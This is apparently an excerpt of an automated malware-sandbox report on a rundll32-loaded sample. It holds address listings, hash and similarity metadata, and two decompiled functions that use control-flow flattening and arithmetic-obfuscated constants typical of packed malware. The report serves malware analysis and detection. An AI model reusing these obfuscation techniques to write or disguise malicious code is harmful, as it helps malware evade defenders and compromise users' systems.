                                                                                                                    0x003498f8
                                                                                                                    0x00349900
                                                                                                                    0x00349908
                                                                                                                    0x0034990d
                                                                                                                    0x00349915
                                                                                                                    0x0034991d
                                                                                                                    0x00349927
                                                                                                                    0x0034992b
                                                                                                                    0x0034992f
                                                                                                                    0x00349937
                                                                                                                    0x0034993f
                                                                                                                    0x00349947
                                                                                                                    0x0034994f
                                                                                                                    0x00349957
                                                                                                                    0x0034995f
                                                                                                                    0x00349967
                                                                                                                    0x00349974
                                                                                                                    0x00349978
                                                                                                                    0x0034997d
                                                                                                                    0x00349985
                                                                                                                    0x0034998d
                                                                                                                    0x00349991
                                                                                                                    0x0034999e
                                                                                                                    0x003499a2
                                                                                                                    0x003499aa
                                                                                                                    0x003499b2
                                                                                                                    0x003499b7
                                                                                                                    0x003499bc
                                                                                                                    0x003499c4
                                                                                                                    0x003499cc
                                                                                                                    0x003499cc
                                                                                                                    0x003499da
                                                                                                                    0x00349afd
                                                                                                                    0x00349b06
                                                                                                                    0x00349b0d
                                                                                                                    0x00349b0e
                                                                                                                    0x00349b15
                                                                                                                    0x00349b1c
                                                                                                                    0x00349b23
                                                                                                                    0x00349b32
                                                                                                                    0x00349b3d
                                                                                                                    0x00349b49
                                                                                                                    0x00349b54
                                                                                                                    0x00349b62
                                                                                                                    0x00349b69
                                                                                                                    0x00349b70
                                                                                                                    0x00349b74
                                                                                                                    0x00349b76
                                                                                                                    0x00349b79
                                                                                                                    0x00000000
                                                                                                                    0x003499e0
                                                                                                                    0x003499e6
                                                                                                                    0x00349a87
                                                                                                                    0x00349a90
                                                                                                                    0x00349a98
                                                                                                                    0x00349a9e
                                                                                                                    0x00349aac
                                                                                                                    0x00349ac3
                                                                                                                    0x00349ad6
                                                                                                                    0x00349aeb
                                                                                                                    0x00349af0
                                                                                                                    0x00349af3
                                                                                                                    0x00000000
                                                                                                                    0x003499ec
                                                                                                                    0x003499f2
                                                                                                                    0x00349bba
                                                                                                                    0x003499f8
                                                                                                                    0x003499fe
                                                                                                                    0x00349a6d
                                                                                                                    0x00349a72
                                                                                                                    0x00349a74
                                                                                                                    0x00349a77
                                                                                                                    0x00349a7a
                                                                                                                    0x00349a80
                                                                                                                    0x00000000
                                                                                                                    0x00349a80
                                                                                                                    0x00349a00
                                                                                                                    0x00349a06
                                                                                                                    0x00349a31
                                                                                                                    0x00000000
                                                                                                                    0x00349a08
                                                                                                                    0x00349a0e
                                                                                                                    0x00000000
                                                                                                                    0x00349a14
                                                                                                                    0x00349a24
                                                                                                                    0x00349a2a
                                                                                                                    0x00000000
                                                                                                                    0x00349a2a
                                                                                                                    0x00349a0e
                                                                                                                    0x00349a06
                                                                                                                    0x003499fe
                                                                                                                    0x003499f2
                                                                                                                    0x003499e6
                                                                                                                    0x00349bc5
                                                                                                                    0x00349bce
                                                                                                                    0x00349bce
                                                                                                                    0x00349b88
                                                                                                                    0x00349b8f
                                                                                                                    0x00349b94
                                                                                                                    0x00349b9b
                                                                                                                    0x00349b9b
                                                                                                                    0x00349b9b
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: HwP$QjTF
                                                                                                                    • API String ID: 0-4190319459
                                                                                                                    • Opcode ID: 0c8075fb2a241be7b7eb07256836c4d733172367cb5fd4d9d5111fe2288b43dc
                                                                                                                    • Instruction ID: 1d21527ff3a8d96ca9548ffa695ad76a03b85c38141d3724753a77243aff8485
                                                                                                                    • Opcode Fuzzy Hash: 0c8075fb2a241be7b7eb07256836c4d733172367cb5fd4d9d5111fe2288b43dc
                                                                                                                    • Instruction Fuzzy Hash: BAE11E714093819FD369CF25C58A61BBBE1FBC4748F208A1DF2968A260D7B59949CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 93%
                                                                                                                    			E00341889(void* __ecx) {
                                                                                                                    				char _v520;
                                                                                                                    				char _v1040;
                                                                                                                    				char _v1560;
                                                                                                                    				short _v1564;
                                                                                                                    				intOrPtr _v1568;
                                                                                                                    				signed int _v1572;
                                                                                                                    				signed int _v1576;
                                                                                                                    				signed int _v1580;
                                                                                                                    				signed int _v1584;
                                                                                                                    				signed int _v1588;
                                                                                                                    				signed int _v1592;
                                                                                                                    				signed int _v1596;
                                                                                                                    				signed int _v1600;
                                                                                                                    				signed int _v1604;
                                                                                                                    				signed int _v1608;
                                                                                                                    				signed int _v1612;
                                                                                                                    				signed int _v1616;
                                                                                                                    				signed int _v1620;
                                                                                                                    				signed int _v1624;
                                                                                                                    				signed int _v1628;
                                                                                                                    				signed int _v1632;
                                                                                                                    				signed int _v1636;
                                                                                                                    				signed int _v1640;
                                                                                                                    				signed int _v1644;
                                                                                                                    				signed int _v1648;
                                                                                                                    				signed int _v1652;
                                                                                                                    				signed int _v1656;
                                                                                                                    				signed int _v1660;
                                                                                                                    				signed int _v1664;
                                                                                                                    				signed int _v1668;
                                                                                                                    				signed int _v1672;
                                                                                                                    				signed int _v1676;
                                                                                                                    				signed int _v1680;
                                                                                                                    				signed int _t323;
                                                                                                                    				signed int _t334;
                                                                                                                    				signed int _t337;
                                                                                                                    				signed int _t338;
                                                                                                                    				signed int _t339;
                                                                                                                    				signed int _t340;
                                                                                                                    				signed int _t341;
                                                                                                                    				signed int _t342;
                                                                                                                    				signed int _t343;
                                                                                                                    				signed int _t344;
                                                                                                                    				signed int _t345;
                                                                                                                    				signed int _t346;
                                                                                                                    				void* _t386;
                                                                                                                    				void* _t387;
                                                                                                                    				signed int* _t390;
                                                                                                                    
                                                                                                                    				_t390 =  &_v1680;
                                                                                                                    				_v1568 = 0xdfec4c;
                                                                                                                    				_t386 = __ecx;
                                                                                                                    				_v1564 = 0;
                                                                                                                    				_t387 = 0xea1969c;
                                                                                                                    				_v1596 = 0xb94d4f;
                                                                                                                    				_v1596 = _v1596 >> 2;
                                                                                                                    				_v1596 = _v1596 ^ 0x002b88ba;
                                                                                                                    				_v1604 = 0x7820e8;
                                                                                                                    				_t9 =  &_v1604; // 0x7820e8
                                                                                                                    				_t337 = 0x3f;
                                                                                                                    				_v1604 =  *_t9 / _t337;
                                                                                                                    				_v1604 = _v1604 << 6;
                                                                                                                    				_v1604 = _v1604 ^ 0x0075b154;
                                                                                                                    				_v1676 = 0xd796f6;
                                                                                                                    				_v1676 = _v1676 << 7;
                                                                                                                    				_t338 = 0x1f;
                                                                                                                    				_v1676 = _v1676 / _t338;
                                                                                                                    				_v1676 = _v1676 | 0x34dfec15;
                                                                                                                    				_v1676 = _v1676 ^ 0x37fcd475;
                                                                                                                    				_v1580 = 0x701ced;
                                                                                                                    				_t339 = 0x3b;
                                                                                                                    				_v1580 = _v1580 / _t339;
                                                                                                                    				_v1580 = _v1580 ^ 0x000eda5b;
                                                                                                                    				_v1584 = 0x3864f;
                                                                                                                    				_v1584 = _v1584 | 0xebab6106;
                                                                                                                    				_v1584 = _v1584 ^ 0xeba3c8dc;
                                                                                                                    				_v1668 = 0x7d6229;
                                                                                                                    				_v1668 = _v1668 + 0x90f9;
                                                                                                                    				_t340 = 0x7d;
                                                                                                                    				_v1668 = _v1668 * 0xd;
                                                                                                                    				_v1668 = _v1668 + 0x17d6;
                                                                                                                    				_v1668 = _v1668 ^ 0x06671cb6;
                                                                                                                    				_v1652 = 0x8dafad;
                                                                                                                    				_v1652 = _v1652 + 0xffffa237;
                                                                                                                    				_v1652 = _v1652 / _t340;
                                                                                                                    				_v1652 = _v1652 ^ 0xeab94c45;
                                                                                                                    				_v1652 = _v1652 ^ 0xeabb4144;
                                                                                                                    				_v1620 = 0x364acf;
                                                                                                                    				_v1620 = _v1620 + 0xffffd559;
                                                                                                                    				_v1620 = _v1620 ^ 0x476b0832;
                                                                                                                    				_v1620 = _v1620 ^ 0x4757dcec;
                                                                                                                    				_v1660 = 0xdffac8;
                                                                                                                    				_v1660 = _v1660 | 0xd3f81aab;
                                                                                                                    				_t341 = 0xd;
                                                                                                                    				_v1660 = _v1660 / _t341;
                                                                                                                    				_v1660 = _v1660 + 0x2ca8;
                                                                                                                    				_v1660 = _v1660 ^ 0x10473906;
                                                                                                                    				_v1636 = 0xafa95;
                                                                                                                    				_v1636 = _v1636 | 0x12b9adda;
                                                                                                                    				_v1636 = _v1636 + 0xca30;
                                                                                                                    				_t342 = 0x24;
                                                                                                                    				_v1636 = _v1636 / _t342;
                                                                                                                    				_v1636 = _v1636 ^ 0x008bc8e6;
                                                                                                                    				_v1612 = 0xa1b06d;
                                                                                                                    				_v1612 = _v1612 ^ 0xd927b519;
                                                                                                                    				_t334 = 0x1c;
                                                                                                                    				_v1612 = _v1612 / _t334;
                                                                                                                    				_v1612 = _v1612 ^ 0x07c55aff;
                                                                                                                    				_v1628 = 0xe475d7;
                                                                                                                    				_v1628 = _v1628 + 0xf351;
                                                                                                                    				_v1628 = _v1628 >> 9;
                                                                                                                    				_v1628 = _v1628 ^ 0x000b149a;
                                                                                                                    				_v1644 = 0xc98f78;
                                                                                                                    				_v1644 = _v1644 + 0xa497;
                                                                                                                    				_v1644 = _v1644 + 0xab0a;
                                                                                                                    				_v1644 = _v1644 ^ 0x9916dffd;
                                                                                                                    				_v1644 = _v1644 ^ 0x99d32d23;
                                                                                                                    				_v1572 = 0xdb2c8b;
                                                                                                                    				_v1572 = _v1572 ^ 0xa2354bd4;
                                                                                                                    				_v1572 = _v1572 ^ 0xa2e9b3f6;
                                                                                                                    				_v1616 = 0x8ac290;
                                                                                                                    				_v1616 = _v1616 | 0xd6340cba;
                                                                                                                    				_t343 = 0x17;
                                                                                                                    				_v1616 = _v1616 / _t343;
                                                                                                                    				_v1616 = _v1616 ^ 0x095403ec;
                                                                                                                    				_v1624 = 0xc9b33;
                                                                                                                    				_v1624 = _v1624 | 0xadec2c36;
                                                                                                                    				_t344 = 0x23;
                                                                                                                    				_v1624 = _v1624 / _t344;
                                                                                                                    				_v1624 = _v1624 ^ 0x04f29945;
                                                                                                                    				_v1672 = 0xce6284;
                                                                                                                    				_t345 = 0x1b;
                                                                                                                    				_v1672 = _v1672 * 0x47;
                                                                                                                    				_v1672 = _v1672 >> 0xb;
                                                                                                                    				_v1672 = _v1672 | 0xab5418c0;
                                                                                                                    				_v1672 = _v1672 ^ 0xab589207;
                                                                                                                    				_v1680 = 0xfb4294;
                                                                                                                    				_v1680 = _v1680 * 0x56;
                                                                                                                    				_v1680 = _v1680 >> 0xe;
                                                                                                                    				_v1680 = _v1680 >> 4;
                                                                                                                    				_v1680 = _v1680 ^ 0x000a896c;
                                                                                                                    				_v1576 = 0xa0fe48;
                                                                                                                    				_v1576 = _v1576 / _t345;
                                                                                                                    				_v1576 = _v1576 ^ 0x000b8e8e;
                                                                                                                    				_v1608 = 0x915f33;
                                                                                                                    				_v1608 = _v1608 + 0xfa43;
                                                                                                                    				_v1608 = _v1608 >> 0xc;
                                                                                                                    				_v1608 = _v1608 ^ 0x000a30cc;
                                                                                                                    				_v1648 = 0x21b71b;
                                                                                                                    				_v1648 = _v1648 ^ 0x78ef874e;
                                                                                                                    				_v1648 = _v1648 | 0x9c246086;
                                                                                                                    				_v1648 = _v1648 * 0x4a;
                                                                                                                    				_v1648 = _v1648 ^ 0x1ce73be6;
                                                                                                                    				_v1592 = 0x926794;
                                                                                                                    				_v1592 = _v1592 + 0xffff6f6e;
                                                                                                                    				_v1592 = _v1592 ^ 0x009c0ed2;
                                                                                                                    				_v1656 = 0x919083;
                                                                                                                    				_v1656 = _v1656 / _t334;
                                                                                                                    				_v1656 = _v1656 >> 2;
                                                                                                                    				_t346 = 0x67;
                                                                                                                    				_v1656 = _v1656 / _t346;
                                                                                                                    				_v1656 = _v1656 ^ 0x0003c4fa;
                                                                                                                    				_v1664 = 0xb12839;
                                                                                                                    				_v1664 = _v1664 ^ 0xbcb8295e;
                                                                                                                    				_v1664 = _v1664 + 0xe70b;
                                                                                                                    				_v1664 = _v1664 + 0xffffbcc9;
                                                                                                                    				_v1664 = _v1664 ^ 0xbc0a928f;
                                                                                                                    				_v1600 = 0x37ff42;
                                                                                                                    				_v1600 = _v1600 + 0xffff03fd;
                                                                                                                    				_v1600 = _v1600 >> 3;
                                                                                                                    				_v1600 = _v1600 ^ 0x000f4750;
                                                                                                                    				_v1632 = 0xbb4856;
                                                                                                                    				_v1632 = _v1632 * 0x4e;
                                                                                                                    				_v1632 = _v1632 | 0xf74fdfff;
                                                                                                                    				_v1632 = _v1632 ^ 0xff54b7ec;
                                                                                                                    				_v1640 = 0x73c8d7;
                                                                                                                    				_v1640 = _v1640 * 0x56;
                                                                                                                    				_v1640 = _v1640 << 0xb;
                                                                                                                    				_v1640 = _v1640 >> 7;
                                                                                                                    				_v1640 = _v1640 ^ 0x005dc3ee;
                                                                                                                    				_v1588 = 0xe2f656;
                                                                                                                    				_t323 = _v1588 * 0x57;
                                                                                                                    				_v1588 = _t323;
                                                                                                                    				_v1588 = _v1588 ^ 0x4d200bca;
                                                                                                                    				while(_t387 != 0x5de06da) {
                                                                                                                    					if(_t387 == 0xea1969c) {
                                                                                                                    						_t387 = 0xfa9128f;
                                                                                                                    						continue;
                                                                                                                    					} else {
                                                                                                                    						_t395 = _t387 - 0xfa9128f;
                                                                                                                    						if(_t387 != 0xfa9128f) {
                                                                                                                    							L8:
                                                                                                                    							__eflags = _t387 - 0xa8e801c;
                                                                                                                    							if(__eflags != 0) {
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    						} else {
                                                                                                                    							E0034DA22(_v1596, _v1604, _t395, _v1676,  &_v1040, _t346, _v1580);
                                                                                                                    							 *((short*)(E0033B6CF( &_v1040, _v1584, _v1668, _v1652))) = 0;
                                                                                                                    							E00338969(_v1620,  &_v520, _t395, _v1660, _v1636);
                                                                                                                    							_push(_v1644);
                                                                                                                    							_push(_v1628);
                                                                                                                    							E003347CE( &_v1040, _v1572, _v1612, _v1616, _v1624, E0034DCF7(_v1612, 0x331328, _t395),  &_v520, _v1672, _v1680);
                                                                                                                    							E0033A8B0(_v1576, _t329, _v1608);
                                                                                                                    							_t346 = _v1648;
                                                                                                                    							_t323 = E0033EA99(_t346, _t386, _v1592, _v1656,  &_v1560, _v1664);
                                                                                                                    							_t390 =  &(_t390[0x17]);
                                                                                                                    							if(_t323 != 0) {
                                                                                                                    								_t387 = 0x5de06da;
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					return _t323;
                                                                                                                    				}
                                                                                                                    				_push(_v1588);
                                                                                                                    				_push( &_v1560);
                                                                                                                    				_push(_t346);
                                                                                                                    				_push(0);
                                                                                                                    				_push(0);
                                                                                                                    				_push(_v1640);
                                                                                                                    				_t346 = _v1600;
                                                                                                                    				_push(0);
                                                                                                                    				_t323 = E0033AB87(_t346, _v1632, __eflags);
                                                                                                                    				_t390 =  &(_t390[7]);
                                                                                                                    				_t387 = 0xa8e801c;
                                                                                                                    				goto L8;
                                                                                                                    			}

                                                                                                                    0x00341bea
                                                                                                                    0x00341bf2
                                                                                                                    0x00341bfa
                                                                                                                    0x00341c02
                                                                                                                    0x00341c0a
                                                                                                                    0x00341c12
                                                                                                                    0x00341c1a
                                                                                                                    0x00341c22
                                                                                                                    0x00341c27
                                                                                                                    0x00341c2f
                                                                                                                    0x00341c3c
                                                                                                                    0x00341c40
                                                                                                                    0x00341c48
                                                                                                                    0x00341c50
                                                                                                                    0x00341c5d
                                                                                                                    0x00341c61
                                                                                                                    0x00341c66
                                                                                                                    0x00341c6b
                                                                                                                    0x00341c73
                                                                                                                    0x00341c7b
                                                                                                                    0x00341c80
                                                                                                                    0x00341c84
                                                                                                                    0x00341c8c
                                                                                                                    0x00341c9a
                                                                                                                    0x00341d93
                                                                                                                    0x00000000
                                                                                                                    0x00341ca0
                                                                                                                    0x00341ca0
                                                                                                                    0x00341ca6
                                                                                                                    0x00341dc6
                                                                                                                    0x00341dc6
                                                                                                                    0x00341dcc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00341cac
                                                                                                                    0x00341cc5
                                                                                                                    0x00341cf6
                                                                                                                    0x00341cfd
                                                                                                                    0x00341d02
                                                                                                                    0x00341d0b
                                                                                                                    0x00341d4c
                                                                                                                    0x00341d5e
                                                                                                                    0x00341d7c
                                                                                                                    0x00341d80
                                                                                                                    0x00341d85
                                                                                                                    0x00341d8a
                                                                                                                    0x00341d8c
                                                                                                                    0x00000000
                                                                                                                    0x00341d8c
                                                                                                                    0x00341d8a
                                                                                                                    0x00341ca6
                                                                                                                    0x00341ddc
                                                                                                                    0x00341ddc
                                                                                                                    0x00341d9d
                                                                                                                    0x00341da8
                                                                                                                    0x00341da9
                                                                                                                    0x00341daa
                                                                                                                    0x00341dab
                                                                                                                    0x00341dac
                                                                                                                    0x00341db4
                                                                                                                    0x00341db8
                                                                                                                    0x00341db9
                                                                                                                    0x00341dbe
                                                                                                                    0x00341dc1
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: )b}$ x
                                                                                                                    • API String ID: 0-2724122486
                                                                                                                    • Opcode ID: 7703182d4d2bc7296f7637d8deee2d0ed847d95c3543a1bf8ddd597c9c4a24f8
                                                                                                                    • Instruction ID: 38795143819862467de0f5300b5b0662472882747a21d90ad4270032e3d10414
                                                                                                                    • Opcode Fuzzy Hash: 7703182d4d2bc7296f7637d8deee2d0ed847d95c3543a1bf8ddd597c9c4a24f8
                                                                                                                    • Instruction Fuzzy Hash: CED1227150C3819FE368CF60C48A95BFBE2FBC5358F108A1DF2999A260D7B59949CF42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 99%
                                                                                                                    			E0034473C() {
                                                                                                                    				intOrPtr _v4;
                                                                                                                    				intOrPtr _v8;
                                                                                                                    				intOrPtr _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				signed int _v88;
                                                                                                                    				signed int _v92;
                                                                                                                    				signed int _v96;
                                                                                                                    				signed int _v100;
                                                                                                                    				void* _t218;
                                                                                                                    				signed int _t219;
                                                                                                                    				void* _t225;
                                                                                                                    				void* _t246;
                                                                                                                    				intOrPtr _t251;
                                                                                                                    				signed int _t252;
                                                                                                                    				signed int _t253;
                                                                                                                    				signed int _t254;
                                                                                                                    				signed int _t255;
                                                                                                                    				signed int _t256;
                                                                                                                    				signed int _t257;
                                                                                                                    				intOrPtr _t258;
                                                                                                                    				intOrPtr* _t259;
                                                                                                                    				signed int _t260;
                                                                                                                    				signed int* _t261;
                                                                                                                    
                                                                                                                    				_t261 =  &_v100;
                                                                                                                    				_v12 = 0xf244e3;
                                                                                                                    				_v8 = 0x291d6d;
                                                                                                                    				_t225 = 0x37f2dd7;
                                                                                                                    				_t251 = 0;
                                                                                                                    				_v4 = 0;
                                                                                                                    				_v68 = 0x555e8d;
                                                                                                                    				_v68 = _v68 + 0xfffff532;
                                                                                                                    				_v68 = _v68 | 0x235b50f0;
                                                                                                                    				_v68 = _v68 ^ 0x235e53ff;
                                                                                                                    				_v84 = 0xf72ec;
                                                                                                                    				_v84 = _v84 >> 7;
                                                                                                                    				_t252 = 0x19;
                                                                                                                    				_v84 = _v84 / _t252;
                                                                                                                    				_v84 = _v84 << 3;
                                                                                                                    				_v84 = _v84 ^ 0x000f09df;
                                                                                                                    				_v20 = 0xee8389;
                                                                                                                    				_t253 = 0x51;
                                                                                                                    				_v20 = _v20 * 0x29;
                                                                                                                    				_v20 = _v20 ^ 0x2635dc09;
                                                                                                                    				_v88 = 0xea545e;
                                                                                                                    				_t30 =  &_v88; // 0xea545e
                                                                                                                    				_v88 =  *_t30 / _t253;
                                                                                                                    				_t36 =  &_v88; // 0xea545e
                                                                                                                    				_t254 = 0x7a;
                                                                                                                    				_v88 =  *_t36 * 0x1c;
                                                                                                                    				_v88 = _v88 + 0xc9a8;
                                                                                                                    				_v88 = _v88 ^ 0x005db592;
                                                                                                                    				_v24 = 0x448750;
                                                                                                                    				_v24 = _v24 / _t254;
                                                                                                                    				_v24 = _v24 ^ 0x000cab3c;
                                                                                                                    				_v28 = 0x8cea36;
                                                                                                                    				_v28 = _v28 * 0x38;
                                                                                                                    				_v28 = _v28 ^ 0x1eda9ad9;
                                                                                                                    				_v100 = 0x8110ba;
                                                                                                                    				_v100 = _v100 + 0x3ab9;
                                                                                                                    				_v100 = _v100 ^ 0x336ca884;
                                                                                                                    				_v100 = _v100 + 0xffff8c66;
                                                                                                                    				_v100 = _v100 ^ 0x33e0711c;
                                                                                                                    				_v64 = 0x5ca85e;
                                                                                                                    				_v64 = _v64 >> 0x10;
                                                                                                                    				_v64 = _v64 * 0x4e;
                                                                                                                    				_v64 = _v64 ^ 0x000b11ab;
                                                                                                                    				_v44 = 0x2bb2b6;
                                                                                                                    				_v44 = _v44 | 0xbbfbcd5f;
                                                                                                                    				_v44 = _v44 ^ 0xbbf16182;
                                                                                                                    				_v72 = 0x855f4c;
                                                                                                                    				_v72 = _v72 ^ 0x87656771;
                                                                                                                    				_v72 = _v72 * 0x71;
                                                                                                                    				_v72 = _v72 ^ 0xf9f8e59a;
                                                                                                                    				_v96 = 0x938339;
                                                                                                                    				_v96 = _v96 << 8;
                                                                                                                    				_v96 = _v96 << 0xf;
                                                                                                                    				_v96 = _v96 ^ 0xcc040e17;
                                                                                                                    				_v96 = _v96 ^ 0x50841052;
                                                                                                                    				_v40 = 0xbe1d32;
                                                                                                                    				_v40 = _v40 + 0x9b9c;
                                                                                                                    				_v40 = _v40 ^ 0x00bc2d0e;
                                                                                                                    				_v56 = 0x9e5686;
                                                                                                                    				_v56 = _v56 + 0xffffd134;
                                                                                                                    				_v56 = _v56 + 0xffff1440;
                                                                                                                    				_v56 = _v56 ^ 0x0091c9b6;
                                                                                                                    				_v60 = 0xb7e614;
                                                                                                                    				_v60 = _v60 << 3;
                                                                                                                    				_v60 = _v60 >> 8;
                                                                                                                    				_v60 = _v60 ^ 0x00065aea;
                                                                                                                    				_v32 = 0x537989;
                                                                                                                    				_v32 = _v32 + 0xffff7fce;
                                                                                                                    				_v32 = _v32 ^ 0x005430a6;
                                                                                                                    				_v92 = 0x1586eb;
                                                                                                                    				_t255 = 0x27;
                                                                                                                    				_v92 = _v92 * 0x18;
                                                                                                                    				_v92 = _v92 >> 7;
                                                                                                                    				_v92 = _v92 * 0x26;
                                                                                                                    				_v92 = _v92 ^ 0x009f543a;
                                                                                                                    				_v52 = 0xc32f0b;
                                                                                                                    				_v52 = _v52 | 0xcd8d244f;
                                                                                                                    				_v52 = _v52 >> 4;
                                                                                                                    				_v52 = _v52 ^ 0x0cd427c3;
                                                                                                                    				_v36 = 0xd9cf6a;
                                                                                                                    				_v36 = _v36 / _t255;
                                                                                                                    				_v36 = _v36 ^ 0x000f5a1a;
                                                                                                                    				_v16 = 0xbb623f;
                                                                                                                    				_v16 = _v16 ^ 0xe760556d;
                                                                                                                    				_v16 = _v16 ^ 0xe7dfff62;
                                                                                                                    				_v76 = 0x7fa35c;
                                                                                                                    				_v76 = _v76 >> 0xa;
                                                                                                                    				_v76 = _v76 + 0xffff049d;
                                                                                                                    				_v76 = _v76 ^ 0x38c60922;
                                                                                                                    				_v76 = _v76 ^ 0xc73f93c8;
                                                                                                                    				_v80 = 0x34ea16;
                                                                                                                    				_v80 = _v80 | 0x70dfffff;
                                                                                                                    				_t256 = 0x78;
                                                                                                                    				_t257 = _v16;
                                                                                                                    				_t260 = _v16;
                                                                                                                    				_t224 = _v16;
                                                                                                                    				_v80 = _v80 / _t256;
                                                                                                                    				_v80 = _v80 ^ 0x00f0b2be;
                                                                                                                    				_v48 = 0x2ab377;
                                                                                                                    				_v48 = _v48 << 0xd;
                                                                                                                    				_v48 = _v48 + 0x21bb;
                                                                                                                    				_v48 = _v48 ^ 0x5663e2ae;
                                                                                                                    				while(1) {
                                                                                                                    					L1:
                                                                                                                    					_push(0x5c);
                                                                                                                    					while(_t225 != 0xb8820d) {
                                                                                                                    						if(_t225 == 0x1effdba) {
                                                                                                                    							_t219 = E0033912C(_v84, _v20, _t225, _v88, _t225, _v24, _v28);
                                                                                                                    							_t224 = _t219;
                                                                                                                    							_t261 =  &(_t261[5]);
                                                                                                                    							if(_t219 != 0) {
                                                                                                                    								_t225 = 0xb9a00d9;
                                                                                                                    								goto L11;
                                                                                                                    							}
                                                                                                                    						} else {
                                                                                                                    							if(_t225 == 0x37f2dd7) {
                                                                                                                    								_t225 = 0x43cb3ac;
                                                                                                                    								continue;
                                                                                                                    							} else {
                                                                                                                    								if(_t225 == 0x43cb3ac) {
                                                                                                                    									_t258 =  *0x353e10; // 0x0
                                                                                                                    									_t259 = _t258 + 0x1c;
                                                                                                                    									while( *_t259 != _t246) {
                                                                                                                    										_t259 = _t259 + 2;
                                                                                                                    									}
                                                                                                                    									_t257 = _t259 + 2;
                                                                                                                    									_t225 = 0x1effdba;
                                                                                                                    									goto L12;
                                                                                                                    								} else {
                                                                                                                    									if(_t225 == 0x5d9bea5) {
                                                                                                                    										E00348F9E(_v32, _v92, _v52, _v36, _t260);
                                                                                                                    										_t261 =  &(_t261[3]);
                                                                                                                    										_t225 = 0xb8820d;
                                                                                                                    										goto L11;
                                                                                                                    									} else {
                                                                                                                    										if(_t225 == _t218) {
                                                                                                                    											E0033E249(_v96, _t260, _v40, _v56, _v60);
                                                                                                                    											_t261 =  &(_t261[3]);
                                                                                                                    											_t251 =  !=  ? 1 : _t251;
                                                                                                                    											_t225 = 0x5d9bea5;
                                                                                                                    											L11:
                                                                                                                    											_t246 = 0x5c;
                                                                                                                    											L12:
                                                                                                                    											_t218 = 0x9850ebe;
                                                                                                                    											continue;
                                                                                                                    										} else {
                                                                                                                    											if(_t225 != 0xb9a00d9) {
                                                                                                                    												L22:
                                                                                                                    												if(_t225 != 0x8a80d0f) {
                                                                                                                    													continue;
                                                                                                                    												}
                                                                                                                    											} else {
                                                                                                                    												_t260 = E003342C4(_v100, _t224, _v64, _v68, _t257, _v44, _v72);
                                                                                                                    												_t261 =  &(_t261[5]);
                                                                                                                    												_t218 = 0x9850ebe;
                                                                                                                    												_t225 =  !=  ? 0x9850ebe : 0xb8820d;
                                                                                                                    												goto L1;
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						return _t251;
                                                                                                                    					}
                                                                                                                    					E00348F9E(_v16, _v76, _v80, _v48, _t224);
                                                                                                                    					_t261 =  &(_t261[3]);
                                                                                                                    					_t225 = 0x8a80d0f;
                                                                                                                    					_t218 = 0x9850ebe;
                                                                                                                    					_t246 = 0x5c;
                                                                                                                    					goto L22;
                                                                                                                    				}
                                                                                                                    			}

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ^T$mU`
                                                                                                                    • API String ID: 0-1245783925
                                                                                                                    • Opcode ID: c5d278409c0667b707bd9570ce98eb9fad4761b6d647dd33dfe43dfb01c1e26f
                                                                                                                    • Instruction ID: 882676c001cbb40a32869b2f6b359805971c413f5befc1d59253e9cc708eca94
                                                                                                                    • Opcode Fuzzy Hash: c5d278409c0667b707bd9570ce98eb9fad4761b6d647dd33dfe43dfb01c1e26f
                                                                                                                    • Instruction Fuzzy Hash: E6B132715093409FC359CF25898A51BFBE1FBC4758F108A2DF69A9A260D3B1DA49CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

